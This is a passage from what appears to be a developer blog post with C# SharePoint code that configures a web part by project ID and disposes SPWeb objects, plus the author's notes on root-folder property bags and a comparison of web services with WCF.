targetsite.GetFile(alldocumentsview.ServerRelativeUrl);                         wpmgr = alldocfile.GetLimitedWebPartManager(PersonalizationScope.Shared);                         ConfigureWebPart(wpmgr, projectId, CUSTOMWPNAME);                                              alldocfile.Update();                     }                                        if (newList.ParentWeb != targetsite)                         newList.ParentWeb.Dispose();                     _globalResult = new ServiceResult(true, "Success", "Success");                 }                 catch (Exception ex)                 {                     _globalResult = new ServiceResult(false, (string.IsNullOrEmpty(ex.Message) ? "None" : ex.Message + " " + templateName), ex.StackTrace.ToString());                 }                 finally                 {                     if (wpmgr != null)                     {                         wpmgr.Web.Dispose();                         wpmgr.Dispose();                     }                 }             }                         }       private void ConfigureWebPart(SPLimitedWebPartManager mgr, string prjId, string webpartname)         {             var wp = mgr.WebParts.Cast<System.Web.UI.WebControls.WebParts.WebPart>().FirstOrDefault(x => x.DisplayTitle.Equals(webpartname));             if (wp != null)             {                           (wp as ListRelationshipWebPart.ListRelationshipWebPart).ProjectID = prjId;                 mgr.SaveChanges(wp);             }         }   This Shows you how I was able to set metadata on the document library. It has to be added to the RootFolder of the document library, Unfortunately, the SPList does not have a Property bag that I can add a key\value pair to. It has to be done on the root folder. Now everything in the integration will reference projects by ID's and will not care about names. My, "DocLibExists" will now need to be changed because a web service is not set up to look at property bags.  I had to write another method on the Service to do the equivalent but with ID's instead of names.  The second thing you will notice about the code is the use of the Webpartmanager. I have seen several examples online, and also read a lot about memory leaks, The above code does not produce memory leaks. The web part manager creates an SPWeb, so just dispose it like I did. CONCLUSION This is a long long post so I will stop here for now, I will continue with more comparisons and limitations in my next post. My conclusion for this example is that Web Services will do the trick if you can suffer through CAML and if you are doing some simple operations. For Everything else, there's WCF! **** fireI apologize for the disorganization of this post, I was on a bus on a 12 hour trip to IOWA while I wrote it, I was half asleep and half awake, hopefully it makes enough sense to someone.

    Read the article

< Previous Page | 96 97 98 99 100 101 102 103 104 105 106 107  | Next Page >